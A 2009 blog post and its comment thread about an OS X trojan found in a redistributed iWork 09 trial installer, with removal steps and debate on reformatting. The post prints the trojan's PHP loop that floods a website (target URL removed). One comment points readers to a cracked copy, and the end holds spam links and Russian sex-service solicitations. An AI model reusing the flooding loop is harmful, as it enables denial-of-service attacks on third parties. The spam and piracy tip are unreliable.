January 16, 2009
Hit by an OS X exploit
This morning I found a bunch of these processes chewing 100% CPU on my laptop (OS X 10.5.6):
php -r while(1){
$mh = curl_multi_init(); $ch = array();
for($i = 0; $i < 100; $i++){
^I$ch[$i] = curl_init(); ^Icurl_setopt($ch[$i], CURLOPT_URL, "http://...");
^Icurl_setopt($ch[$i], CURLOPT_HEADER, 0);
^Icurl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
^Icurl_multi_add_handle($mh, $ch[$i]);
}
do{ ^Icurl_multi_exec($mh, $running); }
while($running > 0);
for($i = 0; $i < 100; $i++){ ^Icurl_multi_remove_handle($mh, $ch[$i]); }
curl_multi_close($mh);
}
That’s a PHP script, running as root, and DoSing a website. (I've taken out the website URL, but it is one that has recently been under a documented DDoS attack.)
I'm still trying to work out how these got fired up. My machine was otherwise idle at the time they started. Unfortunately I didn’t capture the PPID, so I'm not sure what kicked them off.
If you see something similar, use ps -Alww to capture as much info about them as you can, and see if you can work out what triggered them.
Update: And, thanks to Nathan de Vries, I know what triggered it.
root 94427 0.0 0.0 599816 172 ?? S 9Jan09 0:00.02
/Users/pete/Downloads/iWork.09/iWork09Trial.mpkg/Contents/
Packages/iWorkServices.pkg/Contents/Resources/iworkservices
My copy of the iWork 09 trial installer contained a trojan.
This copy was passed to me through multiple hands. If I'd done the smart thing, and got my copy straight from Apple, I wouldn’t have had this problem.
At least I know it’s not a remote exploit! I'm still contemplating formatting and reinstalling. Who knows what else might be floating around?
I get hit by that trojan too but since I'm in a foreign country, I don’t have any backup all my data are on my drive so I'm not going to format it ! Since it’s not a virus, I don’t really expect it from modifiying randomly my apps. I really think it was just a backdoor to ddos some website and nothing more.
I had thoses php process but I killed them as my fan was really noisy in the middle of the night. Now I deleted every know pieces. I will see in the future but I really think nothing is going to happen (more than that I mean).
does anyone know how to get rid of all the components without having to reformat?
If u had it, no telliing what it could have done. From what I understand pretty much anything, it was running as root… I'd re-format no question.
You should be able to do the following to remove the trojan:
1) (open Terminal.app) 2) sudo su (enter password) 3) rm -r /System/Library/StartupItems/iWorkServices 4) rm /private/tmp/.iWorkServices 5) rm /usr/bin/iWorkServices 6) rm -r /Library/Receipts/iWorkServices.pkg 7) killall -9 iWorkServices
That being said, you can never be sure with these things so formatting is your best option if at all possible.
I was about to be as dumb as you were! Thanks for sharing your experience, I am now running to the Apple store to buy legal software as I normally do.
Would you be willing to share the url of the website under attack. We are investingating a recent ddos and suspect this may be related.
Don: You have email.
That script works great unless the trojan is smarter. sudo su is completely unnecessary and for safety’s sake you should always use full paths for everything. Even that isn’t a guarantee of course as a really good trojan could have installed a rootkit by now. Give them your password and you don’t own the house anymore. But full paths with sudo as a prefix (and not sudo) is your best shot.
—> (and not sudo su)
Oh – in the MacRumors/NdV method there’s of course a final 8th step. ‘exit’. ;) Cheers.
PS. We have tools to monitor installs but every system has find. And find can tell you everything that’s been modified on a system from time 1 to time 2. I really don’t understand why people don’t take advantage of this. Cheers again.
Find is a great thing to use Rick. But here’s the problem, in the average day my desktop has over 1000+ files that have been modified, more if I did heavy web browsing. It’s just not always possible to narrow that window enough…
Hey Pete
I am writing an article on the malware threat to Macs. If you have a moment or two, maybe I could ask you some questions by email? By the way, I'm aware it’s pretty late in Australia, so if you were planning on an early night, I understand. :–) Paul
get rid of it…https://isc.sans.org/diary.html?storyid=5743
FYI: SecureMac has released FREE iServices Trojan Removal Tool 1.1 (Formally known as iWorkServices Trojan Removal Tool 1.0) a free utility to assist with the removal of the OSX.Trojan.iServices.A and OSX.Trojan.iServices.B trojans distributed with pirated software. http://www.securemac.com/ http://macscan.securemac.com/files/iServicesTrojanRemovalTool.dmg
“since I'm in a foreign country, I don’t have any backup”
What does being in a foreign country have to do with backing up your data? Do foreign countries not believe in data protection?
I assume he means he’s currently in a foreign country and does not have access to his backups
A word of advice. If the processes were running under root then your box was “rooted” when you installed the software. There’s no telling what it hid were. Reformating is the ONLY! way to be sure your system is clean. Trojan Removal tools “may” work but you can’t be totally sure. I don’t care what their market hype has to say. Trojans care vary too easily and a “tool” can and will miss things sometime. Sorry to be the bearer of bad news.
Can someone mention how you can check if you actually have this issue??
@Twixie: Rich’s URL gives simple, step-by-step detection (and basic removal) instructions, here:
https://isc.sans.org/diary.html?storyid=5743
I would like to pint out how it does not really need to run as root. It does not really need to, especially if you have your user logged in 24/7 and basically, all it does is access a URL. The very same could have been achieved using any other scripting language provided with the system (Python, Perl and maybe AppleScript, and ofcourse shell scripts).
The “I'm not running as superuser so I should be fine no matter what” is quite a myth (although, not running as superuser is infinitely better than doing so like most WinXP installs) and sadly, some literature keeps on pushing it.
I think that in both the Mac and the Linux world there should be a general acknowledgement that the old days of “I'm not running Windows so I'm fine” are gone. Which means protecting better things like crontabs, autostart-applications (mostly in Desktop Environments), and install processes.
Well, if program installation requires an administrative password – one should be sure where the program coming from and what it would do. Basically “on a side” developer could make system run anything besides intended program after it was installed with the password and it doesn’t have to be a rootkit. Some programs use sudoers delay to attach to the system. Set it to zero and you’ll be fine. Mac OS has beautiful tools that come with the system handy for developers to use: Perl, PHP, AppleScript, bash, curl etc. as well as many other Unix systems. I am a Mac switcher for 5 years, never had an issue so far. I wrote a daemon that sniffs for processes – did not catch anything yet but one would never know.
I would have to concur with the other posters in this forum that state that the only way to be 100% sure that your system is free of any compromise is to perform a complete reformat and reinstall. Once a system has been compromised, especially with root privs, there is no assured degree of confidence that any and all the components have been removed short of a redo. There are simply too many little nooks and crannies that malware can hide undetected. Certainly you could try and suss out all suspect files and folders using find or whatever, but the time and effort you would put into this would likely be considerably more than a complete reinstall.
By the looks of the script, this particular trojan doesn’t seem too sophisticated, so chances are it’s probably as straightforward as it seems to remove, but you can never be too certain. A really good trojan would have a rootkit installed and be merrily owning your box without you ever suspecting a thing.
If you ever want any confidence in your system again, just reinstall and be done with it. Oh, and stop pirating software! ;–)
Guess you were using a cracked copy of iwork.. :)
@Adam: “I love it, a tiny little trojan and you people are talking about formatting your macs. If I had to reformat every infected PC I ran into I would be doing rebuilds all day everyday. ”
Well, if you have any sort of malware running with unrestricted privileges on any platform, trying to recover by just removing what you can find is risky. If the answer to the question “what could the trojan have changed?” is “anything” and you have no trustworthy way to answer “what DID the trojan change?” then just killing the parts you can easily see may be leaving parts in place that can rebuild the full trojan later. The term “rootkit” originated on Unix to describe packages that included self-hiding replacements of core utilities and libraries, but these days it is almost exclusively used to refer to Windows malware that uses Windows misfeatures to hide itself.
That’s the reason why I buy my software as I do it with my hardware too. ;–)
As more Apple pushes OS X into the regular consumer space the more we will get those news cause it will be more and more interesting for the agressors to take over OS X systems.
That is no exploit, it’s your own fault. Next time buy the software legally and install a virus scanner.
But nice discovery!
Just to be clear, the infected iWork trial installer was identical (trojan excepted) to the iWork trial installer available for free from Apple’s web site. It was not a copy of the retail version, and it was not cracked.
(That said, redistributing even the free trial installer is probably against Apple’s license terms.)
Is PHP Sript sort of the same as an Applescript ?
Here’s how to prevent this kind of attack: take a note from Microsoft Vista, and never give admin privileges to any exe that isn’t digitally signed by a trusted entity.
Apple would do well for Mac fans and imitate Microsoft in this way.
If I remember correctly you’ll just want to snatch the pls and replace your trial copies with the *acked version available for download. It works. May have to research it more on Google – look 3 or so weeks back from last Sat.
Its not a remote exploit, its much worse, a dedicated hacker owning your box and launching DDOS from it!
I guess might be a good time to invest in anti virus for mac!
This attempt at releasing a Bot has been somewhat successful. I have two different versions of this running on my machine right now. I emulated and partitioned a section of my drive to replicate on another machine using a phaux proxy server. I also have re routed the default web address to a internal web address and, I am happy to say I'm watching the lil fella work haha!
Unfortunately, it may not be enough to just reformat. Has anyone else had any luck on uncovering any other information about this one?
@AstroChimp —> Your name is well chosen. Unix-like systems such as OS X, Linux, FreeBSD, etc. have always required direct user action in order to run an executable with root privs. Matter of fact, many ‘nix systems go so far as to require a file downloaded from anywhere to be explicitly made executable before it will even run it. Microsoft has only just now caught on to this and implemented it with Vista some 20+ years later. This is why it has always been emphasized to never run as root to avoid having a rampant process or bad executable from doing systemic damage.
That’s a PHP script, running as root, and DoSing a website. (If you see something similar, use ps -Alww to capture as much info about them as you can, and see if you can work out what triggered them.That script works great unless the Trojan is smarter. sudo su is completely unnecessary and for safety’s sake you should always use full paths for everything. Even that isn’t a guarantee of course as a really good Trojan could have installed a root kit by now.A word of advice. If the processes were running under root then your box was “rooted” when you installed the software.
The more popular an operating system gets like OS X, the more it becomes attracted to hackers. Keep up you computer security especially with OS X – it won’t get better!
Just like Nico says, the growing popularity of OS X, especially in the expert’s scene, invites these blackhat smallheads to publish exploits and other hated stuff. I bet when the new Google OS will be launched, it won’t take long to be attacked by several guys “who don’t have other things to do than damaging other people”…
I agree 100% with Webdesign Berlin Fachmann.
@Webdesign Berlin Fachmann Maybe you’re true, hope it will not be too easy for them to damage anything, but probably this problem will always exist.
Reading this far too late. I downloaded iWorks trial from the apple site. I had the family pkg of iWork/iLife on order but I could not wait. When I attempted to do the install I had problems and had to delete the trial. My computer was new and I made frequent complaints to apple and intego that my computer was compromised. In October I discovered that my computer was remotely controlled. Apple support treated me like dirt after that. Ultimately after my threats apple replaced my premier MacBook pro in late November. Since it did not match up to the my other mac I have yet to open the box. I believed this to be a part of the java problem. Has anyone else indicated that they downloaded from the apple site?
I've never heard reports of anyone getting a virus or malware from any installer supplied directly by Apple, and I'd be very surprised if that ever happened.
I'm also not sure what you mean by “the java problem”?
OSX Java Threat CVE-2008-5353
Oh yeah, I remember that one. It’s nothing to do with the issue discussed in this blog post though.
I followed a link from MacWorld. It sounded so exactly like the scenario I discovered on my laptop. Just made me wonder. Either way I had a java host on my system using every possible method of exporting info.
That is one of the reasons why Apple introduced the Mac App Store. Because the number of sold Macs is rising constantly, OSX will have to deal with exploits more often in the future.
The more popular an operating system gets like OS X, the more it becomes attracted to hackers. Keep up you computer security especially with OS X – it won’t get better!
purchase with confident online
<a href=http://www.jacketscanadashop.com/> http://www.jacketscanadashop.com/ </a> <a href=http://www.jasonhb.cz/navstevni-kniha.php?kontrola>Cheap The North Face L/S Baselayer Shirt – Youth – Girl’s 2012 </a> <a href=http://forums.creativeshake.com/forumFramePost.asp?error_msg=Input%2520verification%2520failed&name=imaretrisiobe&company=google&email=ju.lon.gj.ul.o.ng.2%40gmail.com%250D%250A&opinion=Routinely,%2520papular%2520or%2520simply%2520nodular%2520acne%2520translates%2520towards%2520formation%2520of%2520your%2520cyst.%2520These%2520inflammations%2520could%2520possibly%2520occur%25201%2520by%25201,%2520or%2520people%2520maybe%2520dozens%2520in%2520the%2520commonplace%2520acne%2520areas%2520-%2520take%2520care%2520of,%2520neck,%2520lower%2520back,%2520chest%2520and%2520also%2520shoulders.%2520There%2520is%2520treatments%2520created%2520for%2520each%2520style%2520of%2520zits.%2520Still,%2520since%2520the%2520severity%2520considering%2520the%2520condition%2520varies%2520by%2520man%2520or%2520women,%2520you%2520%3Ca%2520href=http://www.jacketscanadashop.com/%3Ethe%2520north%2520face%3C/a%3E%2520may%2520want%2520to%2520consult%2520any%2520dermatologist%2520to%2520determine%2520one%2520of%2520the%2520best%2520procedure.%2520Tenacious%25204%2520complexion%2520problems%2520Eczema,%2520Psoriasis,%2520Rosacea%2520together%2520with%2520Skin%2520Cancer%2520is%2520discussed%2520in%2520the%2520distinct%2520content.%2520The%2520North%2520Face%2520Bella%2520rain%2520jacket%2520includes%2520a%2520HyVent?%2520DT%2520EC%2520waterproof,%2520breathable%2520membrane%2520for%2520remarkable%2520rain%2520protection.%250D%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%250D%250Anorth%2520face%2520glovesBusinesses%2520don%E2%80%99t%2520achieve%2520those%2520things%2520if%2520they%2520need%2520to%2520stay%2520in%2520business.%2520Or%2520they%E2%80%99re%2520ready%2520to%2520melt%2520off%2520their%2520expense%2520plan%2520while%2520waiting%2520to%2520make%2520sure%2520who%2520enquiries%2520in.%2520Corporations%2520succeed%2520throughout%2520person-to-person%2520call.%2520It%E2%80%99s%2520described%2520as%2520profits.%2520And%2520a%2520similar%2520thing%2520will%2520additionally%2520apply%2520to%2520finding%2520a%2520job.%2520Resume%2520writers%2520cannot%2520present%2520you%2520with%2520a%2520substitute%2520%3Ca%2520href=http://www.jacketscanadashop.com/%3Ethe%2520north%2520face%3C/a%3E%2520for%2520private%2520input.%2520north%2520face%2520gore%2520tex%2520jacketsNothing%2520could%2520happen%2520suited%2520to%2520you%2520based%2520on%2520a%2520resume-unless%2520you%2520will%2520possess%2520weeks%2520plus%2520months%2520to%2520be%2520able%2520to%2520wait%2520patiently%2520for%2520results%2520out%2520of%2520this%2520crapshoot.%2520But%2520thankfully%2520there%E2%80%99s%2520that%2520systematic%2520methodology%2520that%2520takes%2520benefit%2520for%2520any%2520serious%2520way%2520the%2520hard%2520work%2520market%2520performs.%250D%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%250D%250A%22The%2520process%2520about%2520experts%2520agree%2520it%2520is%2520good,%2520inches%2520she%2520mentioned.%2520%22We%27re%2520actually%2520buying%2520and%2520additionally%2520picking%2520as%2520well%2520as%2520the%2520tenants%2520designed%2520to%2520bonus%2520this%2520sort%2520of%2520task.%2520%22The%2520complete%2520area%2520under%2520the%25205500%2520block%2520out%2520regarding%2520Funeral%2520service%2520obtained%25204%2520property%2520holders.%2520Real%2520estate%2520agents%2520Jody%2520Czajkoski,%2520Chad%2520Dray%2520and%2520also%2520Derek%2520%3Ca%2520href=http://www.jacketscanadashop.com/%3Ethe%2520north%2520face%3C/a%3E%2520Hargrove%2520connected%2520with%2520Moody%2520Rambin%2520Fascinates%2520were%2520mixed%2520up%2520in%2520great%2520deals.%2520Valenti%2520The%2520school%2520projectA%2520%243.%25206%2520thousand%2520thousand%2520enlargement%2520in%2520combination%2520with%2520overhaul%2520with%2520the%2520Institution%2520for%2520Houston%27s%2520Jack%2520J.%2520Valenti%2520The%2520school%2520for%2520Connection%2520will%2520likely%2520be%2520getting%2520into%2520this%2520kind%2520of%2520four%2520weeks.%2520The%2520fresh%2520new%2520ability%2520include%2520some%2520form%2520of%2520two-story%2520videos%2520creation%2520factory,%2520that%2520building%27s%2520earliest%2520conventional%2520entry%2520ways%2520and%2520also%2520refurbished%2520school%2520places%2520of%2520work%2520as%2520well%2520as%2520classrooms.%250D%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%250D%250ARead%2520More:%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%250D%250A%3Ca%2520href=http://www.jacketscanadashop.com/%3E%2520http://www.jacketscanadashop.com/%2520%3C/a%3E%250D%250A%3Ca%2520href=http://www.koyo-coach.com/bbs/forum.php?mod=forumdisplay&fid=46%3Echeap%2520North%2520Face%2520ja%3C/a%3E%250D%250A%3Ca%2520href=http://www.bluelinerings.com/thanks2.html?PHPSESSID=bd59c6098ee4c9debf0523a25bbc0b74%3ETHE%2520NORTH%2520FACE%2520PURPLE%2520LABEL%25202012%2520Spring%2520Daypack%2520%3C/a%3E%250D%250A%3Ca%2520href=http://www.badsuzy.com/%3Enorth%2520face%2520shoes%2520women%2520?%2520Work%2520at%2520Home%2520Jobs%2520%3C/a%3E%250D%250A%3Ca%2520href=http://30secondstomars.ru/forum/index.php?action=profile;u=40040%3EHigh%2520Technology%2520Creates%2520The%2520Best%2520North%2520Face%2520Summit%2520Series%2520%3C/a%3E%250D%250A%3Ca%2520href=http://www.mintjuleptours.com/guestbook/sign.asp%3ENorth%2520Face%2520jackets%2520on%2520sale%2520an%2520ideal%2520balance%2520%3C/a%3E%250D%250A&title=the%2520north%2520face%2520hats%2520Item%2520Not%2520Found%2520>the north face hats Item Not Found </a> <a href=http://www.christbaumhof.net/guestbook/index.php?&mots_search=&lang=german&skin=&&seeMess=1&seeNotes=1&seeAdd=0&code_erreur=b15DtDlVFF>north face black frid Black Friday Deals 2010: 7 Ways To Use </a> <a href=http://htmlgear.lycos.com/>North Face Expect Great Performance with a North Face Backpack </a> <a href=http://www.kawaiweb.com/cgi-bin/BBS/yybbs/yybbs.cgi>North Face jackets for men Face Jackets Outlet </a>
Shit happens :0)
Привет.
Люблю секс и совершенно что с ним связанно. А потому хотелось бы спросить. Где дозволительно разместить магнит фото и не только фото чтобы
поиска секс партнера?
[url=http://grifmk1.narod2.ru/]Праститутки Москвы[/url]
Здесь размещено токмо это искра не то
Хочется чего нибудь соответственно гибче.
А вместе кто и где заказывает праституток в МОскве?
Поделитесь сайтом. Заранее спасибо
Нашел пару сайтов для скачивания книг.
Скачивать книги можно в любом формате.
Почти все есть.
Но все же хотелось бы иметь аналогичный ресурс в заначке. ПОдскажете?
4nNgk5 http://www.RUWE5gOde94HqsfDYIh3uBfJfSMdiDSG.com